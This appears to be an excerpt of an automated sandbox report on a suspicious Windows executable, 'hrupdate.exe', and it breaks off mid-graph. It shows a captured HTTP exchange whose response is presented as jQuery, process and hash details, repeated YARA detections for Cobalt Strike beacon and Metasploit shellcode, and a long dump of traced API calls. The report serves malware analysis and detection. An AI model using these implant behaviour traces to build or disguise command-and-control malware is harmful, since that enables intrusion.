                                    Cookie: __cfduid=PJPkdsXI3RIuvq9_N1aBMF8sepTm8LYzvgsLS-K03YKT-xlyRIH9UrElYHiWo99W1VtzrIFD67Rk1Icyd1sN2DRfyCPVwyCpOSn8p8eXxff4E91ntMK3r4Obk_BWVoA9IlyvgW63AtgCQoUHqHKPzOCw-mYkqI9y-tsbOjEoLtk
                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    2024-12-19 21:48:46 UTC | 235 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.24.0 (Ubuntu)
                                    Date: Thu, 19 Dec 2024 21:48:46 GMT
                                    Content-Type: application/javascript; charset=utf-8
                                    Content-Length: 5649
                                    Connection: close
                                    Cache-Control: max-age=0, no-cache
                                    Pragma: no-cache
                                    2024-12-19 21:48:46 UTC | 5649 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r



                                    Target ID: 0
                                    Start time: 16:45:40
                                    Start date: 19/12/2024
                                    Path: C:\Users\user\Desktop\hrupdate.exe
                                    Wow64 process (32bit): true
                                    Commandline: "C:\Users\user\Desktop\hrupdate.exe"
                                    Imagebase: 0x670000
                                    File size: 244'224 bytes
                                    MD5 hash: 03B14E9338A1C9E5551F9450207F6D84
                                    Has elevated privileges: true
                                    Has administrator privileges: true
                                    Programmed in: C, C++ or other language
                                    Yara matches:
                                    • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.3588908785.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.3588908785.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.3567810102.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.3567810102.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.3867809207.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.3867809207.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.3897384147.00000000046CE000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.3897384147.00000000046CE000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.3896833882.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.3896833882.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3897221347.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3897221347.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.3897221347.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.3897221347.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.3897221347.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000002.3897221347.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3290059419.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3290059419.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.3290059419.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.3290059419.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.3290059419.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.3290059419.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation: low
                                    Has exited: false


                                      Execution Graph

                                      Execution Coverage: 8.8%
                                      Dynamic/Decrypted Code Coverage: 85.4%
                                      Signature Coverage: 11.4%
                                      Total number of Nodes: 2000
                                      Total number of Limit Nodes: 49
66 API calls 18425 469ce57 18424->18425 19173 46944d6 18425->19173 18427 469ce5d 18428 469ce70 18427->18428 18429 469ce76 GetCurrentProcess 18427->18429 19176 46a459b AllocateAndInitializeSid 18428->19176 19231 469897e GetModuleHandleA GetProcAddress 18429->19231 18435 469cea6 19182 4696851 18435->19182 18438 4696851 htonl 18439 469cec2 18438->18439 18440 4696851 htonl 18439->18440 18441 469cecf 18440->18441 19186 4696802 htonl 18441->19186 18444 4696802 2 API calls 18445 469cee4 18444->18445 19189 469681f htons 18445->19189 18453 469cf05 _memset _memcpy_s 19224 46a0df8 18453->19224 18455 469cf4a _memset 18455->17869 18458 46a4ded 18456->18458 18457 46946b4 18457->17872 18457->17874 18458->18457 18459 46a4e34 htonl htonl 18458->18459 18459->18457 18462 4699d61 18460->18462 18461 4699d6f 18461->17896 18462->18461 19404 4699be2 18462->19404 18465 46a1fa9 18464->18465 18466 46a1fa2 18464->18466 18469 46a1fa7 18465->18469 19756 46a1e17 18465->19756 19748 46a1d96 18466->19748 18469->17896 19771 46a4016 18470->19771 18475 4696cbf 18477 4696c6a 18477->18475 18482 46972a9 18481->18482 18483 46972ae 18481->18483 18482->17896 18484 46a4016 RevertToSelf 18483->18484 18485 46972b3 18484->18485 19818 469709e 18485->19818 18490 46a205a 18489->18490 18491 46a206b 18490->18491 18492 46a2080 18490->18492 18494 46a207e 18490->18494 18491->18494 19866 46a2217 18491->19866 18493 46a2217 139 API calls 18492->18493 18492->18494 18493->18494 18494->17896 19907 469d902 18496->19907 18499 469dda1 19935 469dc39 18499->19935 18502 469ddaa GetTickCount 18502->18499 18503 469ddb0 18502->18503 19946 469db9b 18503->19946 18507 46a51db 5 API calls 18506->18507 18508 469748b 18507->18508 18508->17896 19980 4699b21 18509->19980 18512 4699da9 71 API calls 18513 4699abb 18512->18513 18514 4699ace Sleep 18513->18514 19986 4699e5e 18513->19986 18515 4699ad5 18514->18515 18515->17896 18517 4699ac9 18517->18514 18517->18515 18519 46a3f56 18518->18519 18520 46a3f8c 18519->18520 18521 4699b69 73 API calls 
18519->18521 18523 4695fb0 156 API calls 18520->18523 18522 46a3f87 18521->18522 20064 4699d7f 18522->20064 18525 46a3f94 18523->18525 20068 469c288 18525->20068 18530 46a3fe9 18531 46a400e ExitProcess 18530->18531 18532 46a3fee 18530->18532 20085 46a2e65 18532->20085 18533 46a3fa9 Sleep 18533->18533 18534 46a3fb6 18535 46a3fe6 RtlExitUserThread 18534->18535 20081 46a3f25 18534->20081 18535->18530 18540 469a042 66 API calls 18541 46a3fd4 18540->18541 18542 4699f1a 71 API calls 18541->18542 18543 46a3fe3 18542->18543 18543->18535 18545 469ab5e __mbschr_l 18544->18545 18546 469ace6 18545->18546 18547 46aea1b _malloc 66 API calls 18545->18547 18546->17896 18548 469aba3 18547->18548 18549 46aea1b _malloc 66 API calls 18548->18549 18550 469abae _memset _memcpy_s 18549->18550 18551 46aefbb _rand 66 API calls 18550->18551 18552 469ac23 _memset _memcpy_s 18550->18552 18551->18552 18553 469ab4c 66 API calls 18552->18553 18554 469acc3 18553->18554 18555 46ae93e __getstream 66 API calls 18554->18555 18559 46a0b2a 18558->18559 18560 46a0b31 18558->18560 18559->17896 18561 46aea1b _malloc 66 API calls 18560->18561 18562 46a0b3a 18561->18562 18563 46a0b4f 18562->18563 20139 46a7555 18562->20139 18565 46ae93e __getstream 66 API calls 18563->18565 18565->18559 18566 46af27d 66 API calls 18569 46a0b6a _memcpy_s 18566->18569 18567 46a7204 5 API calls 18567->18569 18568 469cff3 htonl 18568->18569 18569->18563 18569->18566 18569->18567 18569->18568 18570 46a0c1c 18569->18570 18574 46a0c63 _memcpy_s 18569->18574 18571 46ae93e __getstream 66 API calls 18570->18571 18572 46a0c24 18571->18572 18575 46ae93e __getstream 66 API calls 18574->18575 18575->18559 18577 469f1aa htonl htonl 18576->18577 18579 469f1e7 _memset 18576->18579 18578 469f1ca 18577->18578 18577->18579 18578->18577 18578->18579 18579->17896 18581 469958d 18580->18581 18582 46995d0 18580->18582 18584 46995a4 18581->18584 20181 4699496 18581->20181 18582->17897 18584->18582 18585 46995d2 18584->18585 18587 46ae93e 
__getstream 66 API calls 18584->18587 18586 46ae93e __getstream 66 API calls 18585->18586 18586->18582 18587->18584 18589 469c60a 18588->18589 18590 469c610 GetTickCount 18589->18590 18592 469c645 18589->18592 18590->18589 18591 469c616 GetTickCount htonl 18590->18591 18593 4694495 139 API calls 18591->18593 18592->17897 18593->18589 18595 469bb4e 18594->18595 18606 469bc10 18594->18606 18596 46aea1b _malloc 66 API calls 18595->18596 18599 469bb58 18596->18599 18597 469bb5b htonl htonl htonl 18597->18599 18599->18597 18602 4694495 139 API calls 18599->18602 18603 469bbcc WaitForSingleObject 18599->18603 18604 469bbfb _memset 18599->18604 20467 469bce9 18599->20467 20476 469bc1d PeekNamedPipe 18599->20476 20482 469bc82 18599->20482 18602->18599 18603->18599 18605 46ae93e __getstream 66 API calls 18604->18605 18605->18606 18606->17897 18608 4694495 139 API calls 18607->18608 18609 4697434 18608->18609 18609->17897 18611 4696de9 _memset 18610->18611 18612 4697008 18611->18612 18613 469ea45 66 API calls 18611->18613 18612->17897 18614 4696e23 18613->18614 18615 4696e7d 18614->18615 18617 4696e42 18614->18617 18616 46aeb76 __snprintf 102 API calls 18615->18616 18622 4696e6a _memset 18616->18622 18619 469ab4c 66 API calls 18617->18619 18618 46aeb76 __snprintf 102 API calls 18623 4696eb3 18618->18623 18620 4696e4f 18619->18620 18621 46aeb76 __snprintf 102 API calls 18620->18621 18621->18622 18622->18618 18649 46aec55 __aulldiv 18648->18649 18649->18371 18658 46b061d 18650->18658 18654 46b061d __getptd 66 API calls 18653->18654 18655 46b02b8 18654->18655 18656 46b655e failwithmessage 5 API calls 18655->18656 18657 46b0354 18656->18657 18657->18381 18659 46b05a4 __getptd_noexit 66 API calls 18658->18659 18660 46b0625 18659->18660 18661 46a1bd3 18660->18661 18662 46af00d __amsg_exit 66 API calls 18660->18662 18661->18374 18662->18661 18664 469a7b0 18663->18664 18665 46945d5 18663->18665 18672 469d036 18664->18672 18665->18389 18667 46aea1b _malloc 66 API calls 18671 469a7c8 
18667->18671 18668 469d271 htons 18668->18671 18669 46a4b98 71 API calls 18669->18671 18670 469d036 htons 18670->18671 18671->18665 18671->18667 18671->18668 18671->18669 18671->18670 18673 469d043 18672->18673 18674 469d047 htons 18672->18674 18673->18671 18674->18673 18676 46b096d __fsopen 18675->18676 18677 46b0982 18676->18677 18678 46b0974 18676->18678 18679 46b0989 18677->18679 18680 46b0995 18677->18680 18681 46aea1b _malloc 66 API calls 18678->18681 18682 46ae93e __getstream 66 API calls 18679->18682 18688 46b0b07 18680->18688 18708 46b09a2 _memcpy_s ___sbh_resize_block ___sbh_find_block 18680->18708 18683 46b097c __fsopen _realloc 18681->18683 18682->18683 18683->18395 18684 46b0b3a 18686 46b1f4f _realloc 6 API calls 18684->18686 18685 46b0b0c RtlReAllocateHeap 18685->18683 18685->18688 18689 46b0b40 18686->18689 18687 46b1075 __lock 66 API calls 18687->18708 18688->18684 18688->18685 18690 46b0b5e 18688->18690 18692 46b1f4f _realloc 6 API calls 18688->18692 18694 46b0b54 18688->18694 18691 46b0e0c _calloc 66 API calls 18689->18691 18690->18683 18693 46b0e0c _calloc 66 API calls 18690->18693 18691->18683 18692->18688 18695 46b0b67 GetLastError 18693->18695 18697 46b0e0c _calloc 66 API calls 18694->18697 18695->18683 18709 46b0ad5 18697->18709 18698 46b0a2d RtlAllocateHeap 18698->18708 18699 46b0ada GetLastError 18699->18683 18700 46b0a82 RtlReAllocateHeap 18700->18708 18701 46b1887 ___sbh_alloc_block 5 API calls 18701->18708 18702 46b0aed 18702->18683 18704 46b0e0c _calloc 66 API calls 18702->18704 18703 46b1f4f _realloc 6 API calls 18703->18708 18706 46b0afa 18704->18706 18705 46b0ad0 18707 46b0e0c _calloc 66 API calls 18705->18707 18706->18683 18706->18695 18707->18709 18708->18683 18708->18684 18708->18687 18708->18698 18708->18700 18708->18701 18708->18702 18708->18703 18708->18705 18710 46b10d8 VirtualFree VirtualFree HeapFree ___sbh_free_block 18708->18710 18711 46b0aa5 18708->18711 18709->18683 18709->18699 18710->18708 18714 46b0f9b 
RtlLeaveCriticalSection 18711->18714 18713 46b0aac 18713->18708 18714->18713 18716 46a0f7c 18715->18716 18718 46a0f78 18715->18718 18727 46a0f0a 18716->18727 18718->18404 18720 46aeb76 __snprintf 102 API calls 18719->18720 18721 46a1019 18720->18721 18722 46aeb76 __snprintf 102 API calls 18721->18722 18724 46a102b _memcpy_s 18722->18724 18726 46a10f4 _strncmp 18724->18726 19136 46af27d 18724->19136 19139 46a7204 18724->19139 18726->18406 18734 46aeb76 18727->18734 18729 46a0f23 18729->18729 18730 46aeb76 __snprintf 102 API calls 18729->18730 18731 46a0f5d 18730->18731 18749 46aef9e 18731->18749 18735 46aeba3 18734->18735 18736 46aeb86 18734->18736 18738 46aebcf 18735->18738 18740 46aebb2 18735->18740 18737 46b0e0c _calloc 66 API calls 18736->18737 18739 46aeb8b 18737->18739 18752 46b2128 18738->18752 18741 46b2df7 __fsopen 6 API calls 18739->18741 18742 46b0e0c _calloc 66 API calls 18740->18742 18746 46aeb9b 18741->18746 18745 46aebb7 18742->18745 18747 46b2df7 __fsopen 6 API calls 18745->18747 18746->18729 18747->18746 18750 46aef88 18749->18750 19084 46b3ce0 18750->19084 18792 46b00cd 18752->18792 18755 46b2193 18756 46b0e0c _calloc 66 API calls 18755->18756 18757 46b2198 18756->18757 18759 46b2df7 __fsopen 6 API calls 18757->18759 18760 46b21aa 18759->18760 18761 46b655e failwithmessage 5 API calls 18760->18761 18762 46aebfd 18761->18762 18762->18746 18771 46b1f77 18762->18771 18764 46b2e88 100 API calls _write_multi_char 18765 46b21d4 __aulldvrm _strlen 18764->18765 18765->18755 18765->18760 18765->18764 18766 46ae93e __getstream 66 API calls 18765->18766 18767 46b2ebb 100 API calls _write_multi_char 18765->18767 18768 46b20db 100 API calls _write_string 18765->18768 18769 46b896d 78 API calls __cftof 18765->18769 18770 46b03d1 6 API calls __decode_pointer 18765->18770 18806 46b78ca 18765->18806 18766->18765 18767->18765 18768->18765 18769->18765 18770->18765 18772 46b5392 __fileno 66 API calls 18771->18772 18773 46b1f87 18772->18773 18774 46b1fa9 18773->18774 
18775 46b1f92 18773->18775 18777 46b1fad 18774->18777 18785 46b1fba __flsbuf 18774->18785 18776 46b0e0c _calloc 66 API calls 18775->18776 18779 46b1f97 18776->18779 18778 46b0e0c _calloc 66 API calls 18777->18778 18778->18779 18779->18746 18780 46b20aa 18783 46b52b6 __locking 100 API calls 18780->18783 18781 46b202a 18782 46b2041 18781->18782 18787 46b205e 18781->18787 18912 46b52b6 18782->18912 18783->18779 18785->18779 18788 46b2010 18785->18788 18791 46b201b 18785->18791 18900 46b8787 18785->18900 18787->18779 18937 46b6445 18787->18937 18788->18791 18909 46b873e 18788->18909 18791->18780 18791->18781 18793 46b00e0 18792->18793 18799 46b012d 18792->18799 18794 46b061d __getptd 66 API calls 18793->18794 18795 46b00e5 18794->18795 18796 46b010d 18795->18796 18809 46b744a 18795->18809 18796->18799 18824 46b6cde 18796->18824 18799->18755 18799->18765 18800 46b5392 18799->18800 18801 46b53a1 18800->18801 18805 46b53b6 18800->18805 18802 46b0e0c _calloc 66 API calls 18801->18802 18803 46b53a6 18802->18803 18804 46b2df7 __fsopen 6 API calls 18803->18804 18804->18805 18805->18765 18807 46b00cd _LocaleUpdate::_LocaleUpdate 76 API calls 18806->18807 18808 46b78dd 18807->18808 18808->18765 18810 46b7456 __fsopen 18809->18810 18811 46b061d __getptd 66 API calls 18810->18811 18812 46b745b 18811->18812 18813 46b7489 18812->18813 18814 46b746d 18812->18814 18815 46b1075 __lock 66 API calls 18813->18815 18817 46b061d __getptd 66 API calls 18814->18817 18816 46b7490 18815->18816 18840 46b740c 18816->18840 18819 46b7472 18817->18819 18822 46b7480 __fsopen 18819->18822 18823 46af00d __amsg_exit 66 API calls 18819->18823 18822->18796 18823->18822 18825 46b6cea __fsopen 18824->18825 18826 46b061d __getptd 66 API calls 18825->18826 18827 46b6cef 18826->18827 18828 46b1075 __lock 66 API calls 18827->18828 18831 46b6d01 18827->18831 18830 46b6d1f 18828->18830 18829 46b6d68 18896 46b6d79 18829->18896 18830->18829 18833 46b6d50 InterlockedIncrement 18830->18833 18834 46b6d36 
InterlockedDecrement 18830->18834 18832 46b6d0f __fsopen 18831->18832 18836 46af00d __amsg_exit 66 API calls 18831->18836 18832->18799 18833->18829 18834->18833 18837 46b6d41 18834->18837 18836->18832 18837->18833 18838 46ae93e __getstream 66 API calls 18837->18838 18839 46b6d4f 18838->18839 18839->18833 18841 46b7410 18840->18841 18847 46b7442 18840->18847 18842 46b72e4 ___addlocaleref 8 API calls 18841->18842 18841->18847 18843 46b7423 18842->18843 18843->18847 18851 46b7373 18843->18851 18848 46b74b4 18847->18848 18895 46b0f9b RtlLeaveCriticalSection 18848->18895 18850 46b74bb 18850->18819 18852 46b7407 18851->18852 18853 46b7384 InterlockedDecrement 18851->18853 18852->18847 18865 46b719b 18852->18865 18854 46b7399 InterlockedDecrement 18853->18854 18855 46b739c 18853->18855 18854->18855 18856 46b73a9 18855->18856 18857 46b73a6 InterlockedDecrement 18855->18857 18858 46b73b3 InterlockedDecrement 18856->18858 18859 46b73b6 18856->18859 18857->18856 18858->18859 18860 46b73c0 InterlockedDecrement 18859->18860 18861 46b73c3 18859->18861 18860->18861 18862 46b73dc InterlockedDecrement 18861->18862 18863 46b73f7 InterlockedDecrement 18861->18863 18864 46b73ec InterlockedDecrement 18861->18864 18862->18861 18863->18852 18864->18861 18866 46b721f 18865->18866 18867 46b71b2 18865->18867 18868 46b726c 18866->18868 18869 46ae93e __getstream 66 API calls 18866->18869 18867->18866 18876 46ae93e __getstream 66 API calls 18867->18876 18878 46b71e6 18867->18878 18870 46ba69a ___free_lc_time 66 API calls 18868->18870 18879 46b7293 18868->18879 18871 46b7240 18869->18871 18872 46b728c 18870->18872 18873 46ae93e __getstream 66 API calls 18871->18873 18877 46ae93e __getstream 66 API calls 18872->18877 18880 46b7253 18873->18880 18874 46ae93e __getstream 66 API calls 18884 46b7214 18874->18884 18875 46b72d8 18885 46ae93e __getstream 66 API calls 18875->18885 18886 46b71db 18876->18886 18877->18879 18881 46ae93e __getstream 66 API calls 18878->18881 18894 46b7207 18878->18894 
18879->18875 18882 46ae93e 66 API calls __getstream 18879->18882 18883 46ae93e __getstream 66 API calls 18880->18883 18887 46b71fc 18881->18887 18882->18879 18888 46b7261 18883->18888 18889 46ae93e __getstream 66 API calls 18884->18889 18890 46b72de 18885->18890 18891 46ba874 ___free_lconv_mon 66 API calls 18886->18891 18892 46ba82f ___free_lconv_num 66 API calls 18887->18892 18893 46ae93e __getstream 66 API calls 18888->18893 18889->18866 18890->18847 18891->18878 18892->18894 18893->18868 18894->18874 18895->18850 18899 46b0f9b RtlLeaveCriticalSection 18896->18899 18898 46b6d80 18898->18831 18899->18898 18901 46b8794 18900->18901 18903 46b87a3 18900->18903 18902 46b0e0c _calloc 66 API calls 18901->18902 18904 46b8799 18902->18904 18905 46b87c7 18903->18905 18906 46b0e0c _calloc 66 API calls 18903->18906 18904->18788 18905->18788 18907 46b87b7 18906->18907 18908 46b2df7 __fsopen 6 API calls 18907->18908 18908->18905 18910 46b79cd __malloc_crt 66 API calls 18909->18910 18911 46b8753 18910->18911 18911->18791 18913 46b52c2 __fsopen 18912->18913 18914 46b52ca 18913->18914 18915 46b52e5 18913->18915 18969 46b0e1f 18914->18969 18917 46b52f3 18915->18917 18921 46b5334 18915->18921 18919 46b0e1f __locking 66 API calls 18917->18919 18920 46b52f8 18919->18920 18923 46b0e0c _calloc 66 API calls 18920->18923 18972 46b9d47 18921->18972 18922 46b0e0c _calloc 66 API calls 18930 46b52d7 __fsopen 18922->18930 18925 46b52ff 18923->18925 18927 46b2df7 __fsopen 6 API calls 18925->18927 18926 46b533a 18928 46b535d 18926->18928 18929 46b5347 18926->18929 18927->18930 18932 46b0e0c _calloc 66 API calls 18928->18932 18982 46b4b83 18929->18982 18930->18779 18934 46b5362 18932->18934 18933 46b5355 19041 46b5388 18933->19041 18935 46b0e1f __locking 66 API calls 18934->18935 18935->18933 18938 46b6451 __fsopen 18937->18938 18939 46b647e 18938->18939 18940 46b6462 18938->18940 18942 46b648c 18939->18942 18943 46b64ad 18939->18943 18941 46b0e1f __locking 66 API calls 18940->18941 18945 
46b6467 18941->18945 18944 46b0e1f __locking 66 API calls 18942->18944 18947 46b64cd 18943->18947 18948 46b64f3 18943->18948 18946 46b6491 18944->18946 18949 46b0e0c _calloc 66 API calls 18945->18949 18951 46b0e0c _calloc 66 API calls 18946->18951 18952 46b0e1f __locking 66 API calls 18947->18952 18950 46b9d47 ___lock_fhandle 67 API calls 18948->18950 18953 46b646f __fsopen 18949->18953 18954 46b64f9 18950->18954 18955 46b6498 18951->18955 18956 46b64d2 18952->18956 18953->18779 18957 46b6522 18954->18957 18958 46b6506 18954->18958 18959 46b2df7 __fsopen 6 API calls 18955->18959 18960 46b0e0c _calloc 66 API calls 18956->18960 18962 46b0e0c _calloc 66 API calls 18957->18962 18961 46b63c0 __lseeki64_nolock 68 API calls 18958->18961 18959->18953 18963 46b64d9 18960->18963 18967 46b6517 18961->18967 18964 46b6527 18962->18964 18965 46b2df7 __fsopen 6 API calls 18963->18965 18966 46b0e1f __locking 66 API calls 18964->18966 18965->18953 18966->18967 19080 46b6554 18967->19080 18970 46b05a4 __getptd_noexit 66 API calls 18969->18970 18971 46b0e24 18970->18971 18971->18922 18973 46b9d53 __fsopen 18972->18973 18974 46b9dae 18973->18974 18976 46b1075 __lock 66 API calls 18973->18976 18975 46b9db3 RtlEnterCriticalSection 18974->18975 18978 46b9dd0 __fsopen 18974->18978 18975->18978 18977 46b9d7f 18976->18977 18979 46b9d96 18977->18979 18981 46b4417 __getstream InitializeCriticalSectionAndSpinCount 18977->18981 18978->18926 19044 46b9dde 18979->19044 18981->18979 18983 46b4b92 __write_nolock 18982->18983 18984 46b4beb 18983->18984 18985 46b4bc4 18983->18985 19015 46b4bb9 18983->19015 18988 46b4c53 18984->18988 18989 46b4c2d 18984->18989 18987 46b0e1f __locking 66 API calls 18985->18987 18986 46b655e failwithmessage 5 API calls 18990 46b52b4 18986->18990 18991 46b4bc9 18987->18991 18993 46b4c67 18988->18993 19048 46b63c0 18988->19048 18992 46b0e1f __locking 66 API calls 18989->18992 18990->18933 18994 46b0e0c _calloc 66 API calls 18991->18994 18996 46b4c32 18992->18996 18995 
46b8787 __flsbuf 66 API calls 18993->18995 18998 46b4bd0 18994->18998 18999 46b4c72 18995->18999 19000 46b0e0c _calloc 66 API calls 18996->19000 19001 46b2df7 __fsopen 6 API calls 18998->19001 19002 46b4f18 18999->19002 19007 46b061d __getptd 66 API calls 18999->19007 19003 46b4c3b 19000->19003 19001->19015 19005 46b4f28 19002->19005 19006 46b51e7 WriteFile 19002->19006 19004 46b2df7 __fsopen 6 API calls 19003->19004 19004->19015 19008 46b5006 19005->19008 19031 46b4f3c 19005->19031 19010 46b521a GetLastError 19006->19010 19011 46b4efa 19006->19011 19009 46b4c8d GetConsoleMode 19007->19009 19030 46b50e6 19008->19030 19033 46b5015 19008->19033 19009->19002 19013 46b4cb8 19009->19013 19010->19011 19012 46b5265 19011->19012 19011->19015 19017 46b5238 19011->19017 19012->19015 19016 46b0e0c _calloc 66 API calls 19012->19016 19013->19002 19014 46b4cca GetConsoleCP 19013->19014 19014->19011 19039 46b4ced 19014->19039 19015->18986 19021 46b5288 19016->19021 19018 46b5243 19017->19018 19019 46b5257 19017->19019 19023 46b0e0c _calloc 66 API calls 19018->19023 19061 46b0e32 19019->19061 19020 46b4faa WriteFile 19020->19010 19020->19031 19027 46b0e1f __locking 66 API calls 19021->19027 19022 46b514c WideCharToMultiByte 19022->19010 19024 46b5183 WriteFile 19022->19024 19028 46b5248 19023->19028 19029 46b51ba GetLastError 19024->19029 19024->19030 19025 46b508a WriteFile 19025->19010 19025->19033 19027->19015 19032 46b0e1f __locking 66 API calls 19028->19032 19029->19030 19030->19011 19030->19012 19030->19022 19030->19024 19031->19011 19031->19012 19031->19020 19032->19015 19033->19011 19033->19012 19033->19025 19035 46b4d99 WideCharToMultiByte 19035->19011 19037 46b4dca WriteFile 19035->19037 19036 46b9baf 78 API calls __fassign 19036->19039 19037->19010 19037->19039 19038 46b99d3 11 API calls __putwch_nolock 19038->19039 19039->19010 19039->19011 19039->19035 19039->19036 19039->19038 19040 46b4e1e WriteFile 19039->19040 19058 46b7902 19039->19058 19040->19010 19040->19039 
19079 46b9de7 RtlLeaveCriticalSection 19041->19079 19043 46b5390 19043->18930 19047 46b0f9b RtlLeaveCriticalSection 19044->19047 19046 46b9de5 19046->18974 19047->19046 19066 46b9cd0 19048->19066 19050 46b63de 19051 46b63f7 SetFilePointer 19050->19051 19052 46b63e6 19050->19052 19054 46b640f GetLastError 19051->19054 19055 46b63eb 19051->19055 19053 46b0e0c _calloc 66 API calls 19052->19053 19053->19055 19054->19055 19056 46b6419 19054->19056 19055->18993 19057 46b0e32 __dosmaperr 66 API calls 19056->19057 19057->19055 19059 46b78ca __isleadbyte_l 76 API calls 19058->19059 19060 46b7911 19059->19060 19060->19039 19062 46b0e1f __locking 66 API calls 19061->19062 19063 46b0e3d _realloc 19062->19063 19064 46b0e0c _calloc 66 API calls 19063->19064 19065 46b0e50 19064->19065 19065->19015 19067 46b9cdd 19066->19067 19068 46b9cf5 19066->19068 19069 46b0e1f __locking 66 API calls 19067->19069 19070 46b0e1f __locking 66 API calls 19068->19070 19072 46b9d3a 19068->19072 19071 